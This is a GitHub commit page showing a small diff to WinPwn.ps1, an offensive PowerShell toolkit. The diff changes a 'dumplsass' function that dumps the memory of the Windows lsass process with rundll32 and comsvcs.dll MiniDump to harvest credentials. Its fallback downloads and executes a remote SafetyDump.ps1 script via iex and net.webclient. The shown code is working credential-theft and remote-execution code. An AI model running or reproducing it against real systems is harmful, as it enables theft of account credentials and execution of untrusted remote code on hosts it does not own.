Skip to content

Commit

Permalink
Update WinPwn.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
S3cur3Th1sSh1t authored Aug 31, 2019
1 parent 045074d commit 2f0b811
Showing 1 changed file with 3 additions and 2 deletions.
5 changes: 3 additions & 2 deletions WinPwn.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -503,13 +503,14 @@ function dumplsass
$dumpid = foreach ($process in $processes){if ($process.ProcessName -eq "lsass"){$process.id}}
Write-Host "Found lsass process with ID $dumpid - starting dump with rundll32"
Write-Host "Dumpfile goes to .\Exploitation\$env:computername.dmp "
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $dumpid $currentPath\$env:computername.dmp full
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $dumpid $currentPath\Exploitation\$env:computername.dmp full
}
catch{
Write-Host "Something went wrong, using safetykatz instead"
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SafetyDump.ps1')
Write-Host -ForegroundColor Yellow 'Dumping lsass to C:\windows\temp\debug.bin :'
Write-Host -ForegroundColor Yellow 'Dumping lsass to .\Exploitation\debug.bin :'
Safetydump
move C:\windows\temp\debug.bin $currentPath\Exploitation\debug.bin
}
}
else{Write-Host "No Admin rights, start again using a privileged session!"}
Expand Down

0 comments on commit 2f0b811

Please sign in to comment.